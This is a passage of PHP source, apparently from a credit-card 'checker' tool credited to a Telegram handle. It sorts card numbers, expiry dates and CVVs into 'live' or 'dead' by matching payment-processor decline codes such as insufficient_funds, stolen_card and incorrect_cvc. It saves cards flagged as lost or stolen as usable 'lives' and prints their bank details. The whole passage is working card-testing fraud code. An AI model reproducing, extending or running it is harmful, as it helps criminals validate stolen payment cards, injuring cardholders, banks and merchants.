elseif (strpos($result, 'Your card has insufficient funds.')) {saveInsufficientLives ("Live Card (Insufficient Card) -> $cc|$mon|$year|$cvv | Checker Made By 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live Card</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Insufficient Funds </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "insufficient_funds")) {saveInsufficientLives ("Live Card (Insufficient Card) -> $cc|$mon|$year|$cvv | Checker Made By 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live Card</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Insufficient Funds </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "lost_card" )) {saveLostLives ("Live CCN (Lost Card) -> $cc|$mon|$year|$cvv | Checker Made By 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CCN</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Lost Card </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>
';
}
elseif (strpos($result, "stolen_card" )) {saveStolenLives ("Live CCN (Stolen Card) -> $cc|$mon|$year|$cvv | Checker Made By 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CCN</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Stolen Card </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>
';
}
elseif (strpos($result, "Your card's security code is incorrect." )) {saveCCN ("Live CCN -> $cc|$mon|$year|$cvv | Checker Made By 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CCN</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Your card security code is incorrect </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "incorrect_cvc" )) {saveCCN ("Live CCN -> $cc|$mon|$year|$cvv | Checker Made By 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CCN</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Incorrect CVC </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "pickup_card" )) {savePickupLives ("Live CCN (Pickup Card) -> $cc|$mon|$year|$cvv | Checker Made By 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CCN</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Pickup Card </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result,"fraudulent")){
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Fraudulent </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, 'Your card has expired.')) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Your card has expired </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, 'security code is invalid.' )) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Security Code is Invalid </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "expired_card" )) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Expired Card </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, 'Your card number is incorrect.')) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Your card number is incorrect </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "incorrect_number")) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Incorrect Number </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "service_not_allowed")) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Service Not Allowed </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "do_not_honor")) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Do Not Honor </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "generic_decline")) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Generic Decline </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, 'Your card was declined.')) {
